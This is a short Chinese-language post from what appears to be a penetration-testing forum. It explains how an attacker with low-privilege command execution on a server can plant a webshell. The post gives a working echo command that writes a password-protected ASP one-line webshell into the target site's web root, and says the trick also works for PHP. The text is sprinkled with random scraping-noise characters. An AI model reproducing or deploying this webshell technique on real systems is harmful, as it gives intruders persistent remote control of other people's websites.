中国网络渗透测试联盟

标题: 旁注cmd低权限下拿webshell [打印本页]
作者: admin    时间: 2012-9-23 14:40
标题: 旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
- M: i0 L: u' G6 l! S% R2 }: i1 D. N- J. ^+ K$ @
命令格式( K" V. x0 u) k* m) Z+ r/ z

6 U# P6 V6 e8 _Echo 语句 >目标站绝对目录, a9 ]# H6 o/ R

9 a1 N) m' n* `7 `1 ^, p0 E例如: 7 U* \# d* h" a1 h
6 k9 J0 g- }3 A9 @* g( y: R; z
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp% c2 i% x7 z  }$ @) S0 s' k) f2 F: n0 h
" [/ X. `' _- Y% v9 H
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。9 {# P* H) e& D% K  R5 Z; Y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2